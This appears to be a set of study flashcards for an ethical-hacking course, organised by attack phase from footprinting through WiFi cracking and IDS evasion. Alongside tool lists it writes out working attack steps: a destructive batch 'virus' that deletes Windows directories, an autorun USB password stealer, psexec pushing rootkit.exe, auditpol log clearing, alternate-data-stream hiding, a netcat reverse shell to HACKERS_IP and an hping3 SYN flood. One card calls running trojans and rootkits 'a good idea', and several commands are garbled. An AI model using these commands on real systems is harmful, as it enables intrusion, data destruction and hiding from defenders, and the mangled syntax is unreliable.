Important Tools by steps Flashcards

1
Q

Phase 1: Footprinting

A

Major search engines have an alert system for any updates that occur such as Google

Archive.org (aka The Wayback Machine) allows you to find archived copies of websites form which you can extract information

Netcraft - suite of tools used to obtain web server version, IP address, subnet data, OS info, subdomain info (go to netcraft.com > what’s the site running?)

Link Extractor - this tool locates & extracts the internal and external URLs for a given location

Maltego - a app that illustrates relationship between people, gruops, companies, etc (illustrates the dangers of social networking)

Finance websites - can get company officers, profiles, shares, competitors

Social Media

Job sites

http://whoreadme.com –> allows you to track emails & provides info on OS, browster type, location, etc

Competitive analysis - (establishing what makes your product or service unique; looking at what competitors are doing to see how your target is moving) Tools such as EDGAR (reports), LexisNexis (news), BusinessWire (status), CNBC (future plans)

Google Hacking - Examples of operators include:

1) cache:
2) link:
- —Finding websites that have linked to the page
3) info:
4) site:
5) allintitle:
- –Returns websites w/ specified words in their title
6) allinurl:
7) filetype:

For more: www.exploit-db.com/google-dorks/

NW info - Whois - find domain name, IP info, etc

Tracert - follow the path of traffic from one point to another, find relative performance and latency between hops; find server names, etc

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Phase 2: Scanning

A

Wardialing - dialing into modems (top apps –> ToneLoc, THC-SCAN, NIKSUN’s PhoneSweep

Wardriving - driving around w/ wireless-enabled laptop or device to find access points (top apps –> AirSnort (crack WEPs), AirSnare (alert when unapproved machine connects to ur wireless), Kismet (linux, wireless NW detector, sniffer), NetStumbler (wireless NW detector), inSSIDer (wireless NW detector, mapper of access points)

Pinging - cmd prompt –> ping OR ping OR Nmap.org - used for port scanning –> NMAP -sP -v

Ping sweep - sweeping through range of IPs to find live host….. nMap …

nmap -sP -PE - PA

nmap -sn -PE -PA21,23,80,3389 192.168.10.1-50

Xmas tree in Nmap (sending SYN,ACK,URG,FIN,RST flags to client to see if port is open or closed)–> NMAP -sX -v

FIN scan - only fin packet sent –>
NMAP -sF

Null scan - frame sent with no flags set –>
NMAP -sN

Ack Scan - probe to tell whether or not firewall or router is in use –>
NMAP -sA -P0

**what to do if packet filters, firewalls, or other devices pick up evidence of your attack? FRAGMENT PACKET
NMAP -sS -T4 -A -f -v
other tools&raquo_space; Fragtest, Fragroute (both command line tools)

Port scanning - after finding live hosts, scan for open ports

packet crafting - making custom packets to send & see how target responds (gain info)
–> HPING2 and HPING3 - command-line only creating custom packets for testing

Create an ACK packet & send it to port 80:
Hping3 -A -p 80
Create a SYN scan against different ports:
Hping3 -8 50-56 -s -v
Create packet w/ FIN, URG -p 80

Banner Grabbing - to determine info about services running on a system –> Use Telnet
telnet 80 head/http/1.0
–> Netcraft, Xprobe (linux), p0f (linux)

Countermeasure of banner grabbing - disable or change server info –> IIS Lockdown, ServerMask, etc

hide file extensions to hide technology used to generate pages

tools –> PageXchanger

Vulnerability Scanning –>
Tools –> Nmap, Rapid7, Retina, etc

Setup proxy to hide self –>

1) Find ur IP –> whatismyip.com
2) Search for proxies with IP and port #
3) change proxy settings in browser
4) Find ur IP

Tools –> TOR the onion router used to improve privacy & security for internet; packets cannot be traced; encrypt traffic

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Phase 3: Enumeration

A

1) Extracting info from Email IDs
2) Obtaining info through Default PWs
3) Using Brute-force attacks on Directory Services
4) Exploiting SNMP
5) Working w/ DNS Zone Transfers
6) Capturing User Groups

*Using nbtstat to exploit NetBIOS

*Exploit Null Session
Attach to the system by:
net use \hostnameorIP\ipc$ “ \user:”

View the shares available:
net view \hostnameorIP

Once an attacker has this list of shares, next step is to connect to a share & view the data:
net use s: \hostnameorIP\sharedFolderName

  • SuperScan - many functions
  • PsTools Suite - ^^^

*SNMP enumeration tools –> SNMPUtil, SolarWinds’ IP NW Browser, SNScan (detects devices on a NW enabled for SNMP)

Enum4linux - allows for extraction of info where Samba is in use
Samba - SW that can be run on a platform to share files

LDAP enumeration tools

  • JXplorer
  • LDAP Admin Tool
  • LDAP Account Mgr
  • LEX (The LDAP Explorer)
  • Active Directory Explorer
  • LDAP Administration Tool
  • LDAP search
  • Active Directory Domain Services Mgmt Pack
  • LDAP Browser/Editor
NTP Enumeration
The following commands can be used against an NTP server
1) ntpdate
2) ntptrace
3) ntpdc
4) ntpq

SMTP Enumeration
using telnet & VRFY in cmd:

//use telnet command to attach to the target & extract info; use VRFY command to check if specific user ID is present

telnet
//connected
VRFY username
//response

Using EXPN
telnet 25
//connect
EXPN

Using RCPT TO
telnet  25
MAIL FROM: link
//response
RCPT TO:link
//response

Other Tools for SMTP enumeration include: TamoSoft’s Essential NetTools or NetScanTool Pro

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Phase 4: System Hacking

A

Sniffing tool - Wireshark

1) Passive Online Attacks - sitting back & listening (sniffing tools such as Wireshark, man-in-the-middle attacks, replay attacks)
2) Active Online Attacks - deeper engagement w/ targets w/ intent to break PW (i.e. password guessing, trojan/spyware/key loggers, hash injection, phishing)
3) Offline Attacks - preying on the weaknesses of how PWs are stored; (i.e. precomputed hashes, distributed NW attacks, rainbow attacks)
4) Nontechnical Attacks aka non-electronic attacks - moving from offline into the real world (i.e.shoulder surfing, social engineering, dumpster diving)

Offline Attack
Extracting hashes from a System
1) open cmd
2) type pwdump7.exe //displays hashes
3) type pwdump7.exe > C;\hash.txt
4) Using notepad, browse to the C drive & open the hash.txt file to view the hashes

Generating Rainbow tables - winrtgen (gui-based generator)

Rainbow Crack: Program used to compare Rainbow table with Hash files

Default Passwords: If an attacker can determine that you have not change the default of a guess equipment or system you may have, they can look up your default PW at the following sites:
http://cirt.net
default-password.info
defaultpassword.us
passwordsdatabase.com
w3dr.net
virus.org
open-sez.me
securityoverride.org
routerpasswords.com
fortypoundhead.com

USB Password Theft
embedding a password-stealing application on a USB drive, physically plugging the drive into a target system

USB Password Theft application (steps to steal)
1) Obtain a PW-hacking utility such as pspv.exe
2) Copy it to USB
3) Create a Notepad file called launch.bat containing the following lines:
[autorun]
en = launch.bat
Start pspv.exe /s passwords.txt
4) Save launch.bat to the USB drive

//pspv.exe = protected-storage PW viewer, saves PWs contained in Internet Explorer & other applications

Mitigation: disabling autoplay of USB devices, which is on by default

Apps that may decipher hashes include: Ophcrack, L0phtcrack, pwdump

Privilege Escalation: Change password
Identify an account that has desired access & then change the password using the following tools:

Active@ Password Changer
Trinity REscue Kit
ERD Commander
Windows Recovery Environment (WinRE)
Password Resetter
Trinity Rescue Kit (TRK)
Linux distribution (for Windows & Linux); Can be booted from CD or flash drive

1) cmd line: winpass -u Administrator
2) Choose file system
3) Set Password
4) Type: init 0, to shut down TRK Linux
5) Reboot

//Planting backdoors or run apps on remote system

  • PsTools suite (suite of tools to ease system administration)
  • PsExec is one of them; similar to Telnet but does not need installation & can be run local or remotely; Commands include:

psexec \zelda cmd //launches an interative cmdprmpt on a system name \zelda

psexec \zelda ipconfig /all //executes ipconfig on remote system with the /all switch & outputs locally

psexec \zelda -c rootkit.exe //copies the program rootkit.exe to the remote system & executes it interactively

psexec \zelda -u administrator -c rootkit.exe //copies thee program rootkit.exe to the remote system & executes it interactively using the admin acct on the remote system

Running trojans, rootkits, and backdoors is a good idea;

More programs to attach to a remote system:

  • PDQ Deploy //helps w/ deploying SW to a single system or multiple
  • RemoteExec //Works like PsExec, but makes it easier to restart, reboot, & manipulate folders on the system
  • DameWare //remotely administer & control a system, may not be detected by antivirus utilities
//Covering your tracks
DISABLING AUDITING - Auditing designed to allow for detection & tracking of selected events on a system; we want to alter the way events are logged on target system; 

How to disable running command in Windows:

auditpol \ /clear

Addition tools to surgically remove entries in Windows Security Log:
-Dumpel, Elsave, WinZapper, CCleaner, Wipe, MRU-Blaster, Tracks Erase Pro, Clear My History

How to disable running command in Windows:

auditpol \ /clear

DATA HIDING - hide files placed on the system;

ALTERNATE DATA STREAMS (ADS) (only on NTFS) - major security issue w/ ADS bc it is nearly a perfect mechanism for hiding data; almost impossible to find; The data can lie and wait until the attacker decides to run it later; allows you to hide files within existing files

Creating an ADS:
type triforce.exe > smoke.doc:triforce.exe //executing this command hides triforce.exe behind the file smoke.doc, then delete original triforce.exe

Retrieve the file:
start smoke.doc:triforce.exe //opens hidden file & executes

Tools that can detect those hidden files:

  • SFIND //used to find streamed files
  • LNS //finding ADS streamed files
  • Tripwire //detects changes in files; can detect ADS
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

MALWARE

A

CREATING A VIRUS

Do no execute this code bc it could cause a lot of damage

1) Create a batch file called virus.bat using Notepad

2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*

3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com

Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)

SHEEP DIP SYSTEM
used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; The computer is stripped down & includes on those services & apps needed to test the SW

DETECTING TROJANS & VIRUSES
Tools such as nmap, netstat (not real-time), TCPview (real-time, open ports) to detect open ports & listen for connections on the system

cmd: netstat -an //lists all ports & listening for connections

TOOLS FOR CREATING TROJANS
-let me rule, recub, phatbot, amitis, zombam.b, HTTPRat, Beast, Hard-disk killer, back orifice, BO2K

Tip when creating trojans: TCP vs UDP when choosing protocol to run open port for access to system

UDP is typically used to traverse firewall or security architecture

The port used is port 80 bc it is usually open

Using BO2K
used to install server & install that server on victim’s computer to gain access

BO2K executable needs to be ran on target system; the application runs an executable called Umgr32.exe which may be masked as a different process in task manager; if stealth was not configured, the app appears as Remote Administration Service

WRAPPER programs //merges payload with harmless executable: EliteWrap, Saran Wrap, Trojan Man, Teflon Oil Patch, Restorator, Firekiller 2000

Trojan construction kits: Trojan construction kit, Senna Spy, Stealth Tool

TOOLS to Exploit Covert Channels //Allows you to transmit info in unusual ways: Loki, ICMP backdoor, 007Shell, B0CK, Reverse World Wide Web Tunneling Shell, AckCmd

Keylogger Tools: IKS SW keylogger, Ghost Keylogger, Spector Pro, Fakegina,

USING NETCAT *other tools: Datapipe, Fpipe
//Cmd utility used to read info from connections using TCP or UDP & do port redirection

1) nc -n -v -l -p 80 //set up the listener on system
2) nc -n HACKERS_IP 80 -e cmd.exe //redirect traffic to Hacker’s system
3) Now hacker has victim’s system

Netcat can also do port scanning & place files on target system

nc -v -z -w1 IP_address  - 
//used to scan ports

List of flags for NetCat:
Page 398

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Sniffers

A

//Captures traffic

Besides sniffers, there are HW protocol analyzers which plug directly into the NW at the HW level & can monitor traffic w/ out manipulating traffic

SNIFFING TOOLS
wireshark one; TCPdump; Windump; Omnipeek; Dsniff; EtherApe; MSN SNiffer; NetWitness NextGen

MAC FLOODING //to allow sniffing of NW, we need to make the switch think it is a hub, so flood CAM table w/ MAC addresses
Tools include: Macof;

OVERFLOWING A CAM TABLE USING UBUNTU
Standard repositories store the tools needed for a successful attack; obtained with APTITUDE

1) su to root
2) aptitude install dsniff //install DSNIFF (include Macof)
3) enter cmd: macof //will start flooding CAM table
4) Ctrl +Z to stop

ARP POISONING //attempts to contaminate NW w/ improper gateway mappings

Tools: Ettercap, Cain & Abel, Arpspoof

Cain and Abel is known for ARP poisoning, password cracking, and sniffing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Good place for tools

A

www.sectools.org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Performing a SYN Flood

A

Tool: HPING3 //Linux utility used to craft custom packets such as packets that have specific flags activated

1) Have Wireshark up & running; get sniffer started;
2) In your BackTrack box, open cmd, hping3 for a list of commands
3) hping3 –flood -p 80 -S 192.168.1.2 //Flood SYN packets
4) Check out the traffic
5) Go back to BackTrack & terminate cmd with ctrl+C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Tools for creating Botnets

A

Shark, Plugbot, Poison Ivy, Low Orbit Ion Cannon (LOIC) (the easiest tool)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

DoS and DDoS Tools

A

DoS Tools: DoSHTTP, UDP Flood, Jolt2, Targa

DDoS Tools: Trinoo, LOIC Low Orbit Ion Cannon (easiest tool), TFN2K, Stacheldraht

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Session Hijack

A

Performing a MiTM Attack //Page 543

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Password Cracking

A

Brutus //Page 576

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Tools available to add, check, or list security/vulnerabilities

A

www.openssl.org
www.owasp.org
nessus.org
WinSSLMiM
stunnel.org

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Locating Databases on the NW

A

SQLPing 3.0 is designed to discover DBs

SQLRecon

After locating a database, SQLPing can be used to crack PWs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Link for pen testing tools

A

http://vulnerabilityassessment.co.uk/

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

WiFi

A
WEP //use ciphertext plaintext attack 
//use Kali Linux to sniff and crack PWs

Cracking WEP

intercept as many IVs as possible through sniffing, analyze packets, retrieve key

make take a while, to speed up, perform packet injection

1) Start wireless interface on the attacking system in monitor mode on the specific access point channel; this mode is used to listen to packets in the air
2) probe the target NW with wireless device to determine if packet injection can be performed
3) select tool such as aireplay-ng to perform fake authentication with access point
4) Start WiFi sniffing tool to capture IVs such as aireplay-ng, ARP requests can be intercepted and reinjected back into NW causing more packet generation
5) Run a tool such as Cain and Able or aircrack-ng to extract encryption keys from IVs

AirPcap //used to sniff wireless frames in ways that standard WiFi cannot //good for auditing wireless NWs

Cracking WPA
REAVER //free in Kali, one of the best tools for cracking WPA

Types of attacks on WPA and WPA2

OFFLINE ATTACK //close proximity to access point to observe handshake between client and access point; can capture handshake and recover keys by recording and cracking them offline

DEAUTHENTICATION ATTACK //forcing a reconect

BRUTE-FORCE WPA KEYS //keep trying username and PW combinations over and over again, tools such as aircrack-ng, aireplay-ng, KisMAC

Using Raspberry Pi
//can be used to breach a NW
//can be used to do reverse SSH tunneling, where device opens a connection from inside NW out to attacker to bypass firewall restrictions

WARDRIVING //driving around area with computing device to detect wireless clients and APs
Site Survey Tools KisMAC,NetStumbler, Kismet, WaveStumbler, InSSIDer
//common for these types of tools to connect to GPS to pinpoint location

Warflying // Warballooning //Warwalking //warchalking

ROGUE ACCESS POINTS //attacker installs new AP completely unsecure behind company firewall

MAC SPOOFING //for APs that use Mac filtering, you can use Mac Spoofing; Mac filtering is used to blacklist or whitelist MAC addresses of clients; attacker can spoof address of an apprived client or switch their MAC to a client that is not blocked
Tools SMAC, ifconfig, changemac.sh

AD HOC //use of WiFi adapter to connect direct to another wireless-enabled system; two systems can interact with each other; main threat is users do not know the difference between infrastructure and ad hoc NW and so may attach to an unsecure NW

MISCONFIGURATION

CLIENT MISASSOCIATION //WiFi propagate though walls and structures; client attches to AP that is on a NW other than theirs, accidentally or unintentionally;

PROMISCUOUS CLIENT //offers irresistibly strong signal intentionally for malicious purposes

JAMMING ATTACKS //works on any type of wireless NW, essentially DoS attack; can use a specifically designed HW device that can transmit signals that interfere with 802.11 NWs

HONEYSPOT ATTACK //attacker sets up rogue access point in range of several legit ones
HW device WiFi Pineapple from Hak5

Ways to Locate Wireless NWs (helpful in Wardriving)
Open Signal //app that can be used at http://opensignal.com or mobile device

Wefi //wefi.com

//JiWire

After connecting to the target NW, next is to perform TRAFFIC ANALYSIS
Tools Kismet, Airmagnet, Wireshark with AirPcap, CommView

Some BLUETOOTH attacks include:
leaking calendar, address book, activate cameras, microphones, control a phone to make calls, connect to internet

Wi-Fi jamming to perform DoS on wireless NW

17
Q

Evading IDS, IPS, Firewalls, etc

A

1) NIDS //inspect every packet entering the NW for malicious activity and to throw an alert if found; can monitor from router to host; can be in form of dedicated computer or black box design (dedicated device)
2) HIDS //host-based IDS// installed on server or computer //monitoring activities on a specific system or host; detects misuse of system, insider abuse
3) LFM IDS //Log file monitors //monitors log files created by NW services, identifies malicious events; (tool: swatch)
4) FILE INTEGRITY CHECKING MECHANISMS //checks for trojans or altered files indicating an intruder has been there (tools: tripwire)

EVADING FIREWALLS

**Tools: command-line tool called firewalk

can use packet crafters or port redirection to evade configuration on firewall

IDS Evasion Techniques

DoS vs IDS //use enumeration techniques and system hacking to determine what resources are under load or are vital to proper functioning of IDS, now clog up resources to make IDS not function properly

OBFUSCATING //IDS relies on reading information, if we manipulate info so that IDS cannot understand it but the target can; can be done through manual manipulation of code or use of an OBFUSCATOR;
(One example that is successful against older IDSs is use of Unicode; by changing standard code such as HTTP requests/responses to their unicode equiv, web server understands but IDS does not)

CRYING WOLF //as the story states, an attacker can target the IDS with an actual attack causing IDS to alert owner; if done repeatedly, but nothing happening on the system, owner will eventually ignore it; (will become false positives to the owner) eventually attacker will actually strike

SESSION SPLICING //some IDSs do not reassemble or rebuild sessions before analyzing traffic; possible to tamper with fragment packets in a way IDS cannot analyze them and forwards them to host
//adjust fragmentation so IDS takes longer to reassemble fragments or adjust fragments such that when reassembled they overlap causing problems for IDS

(Fun with flags: TCP uses flags to describe status of packet)
BOGUS RST //RST is used to end 2 way communications between endpoints; in addition checksums are used to verify integrity of packet to ensure what was received was sent originally; an attacker can alter checksum, IDS will not process packet, and the traffic passes by IDS without raising an alert

SENSE OF URGENCY //URG flag used to mark data urgent; all info before is ignored to process urgent data; some IDSs do not take previous data into account and let it pass

ENCRYPTION //MOST EFFECTIVE, some IDSs cannot process encrypted traffic and let it pass

Evading Firewalls

IP ADDRESS SPOOFING //pretending to be a trusted source

SOURCE ROUTING //attacker designates the route a packet should take (a way to prevent this is to configure router to ignore any source routing attempts)

FRAGMENTATION //attacker uses IP fragmentation technique to create extremely small fragments and force into TCP header info into next fragment; IDS ignores TCP flags, only checks first octet

IP ADDRESS TO ACCESS WEBSITES //use of IP address in place of URL; Some firewalls only look at URLs instead of actual IP addresses;
Tools: host2ip //converts URLs to IP addresses

USING ICMP TUNNELING //ICMP protocol defines format and structure of packet, but not what is carried in it so malicious code can be put in there
*Tools: Loki, Ncovert, 007shell //tunnels commands in ICMP packet

USING ACK TUNNELING //some firewalls do not check packets that have ACK bit configured; the reason is bc ACK packets are used to respond to previous, assumed legit traffic already approved; An attacker can send packets with ACK flag set using tool such as AckCmd

HTTP TUNNELING //most easiest since HTTP is already allowed through many firewalls as normal operation;
Tools to exploit HTTP: HTTPTunnel

18
Q

Testing firewall

A

1) Footprint the target
2) perform port scanning
3) perform banner grabbing against open ports
4) attempt firewalking
5) disable trusted hosts
6) perform ip address spoofing
7) perform source routing
8) substitute an ip address for a url
9) perform a fragmentation attack
10) use an anonymizer
11) make use of a proxy server to bypass a firewall
12) use icmp tunneling
13) use ack tunneling

19
Q

Testing IDS

A

1) disable trusted hosts
2) attempt insertion attack
3) implement evasion techniques
4) perform dos
5) use code obfuscation
6) perform false positive generation technique
7) attempt a unicode attack
8) perform a fragmentation attack

20
Q

Physical Security

A

Encryption of hard drives, USBs etc

Tools such as PGP, TrueCrypt, Microsoft BitLocker

Basic components used to pick locks are:
TENSION WRENCHES //small, angled, flathead screwdrivers

PICKS //similar to dentist picks

Technique to pick:
SCRAPING //tension held on lock by tension wrench while pins are scraped quickly; Pins are then placed in mechanical bind and stuck in the unlocked position
available at sties such as wallofsheep.com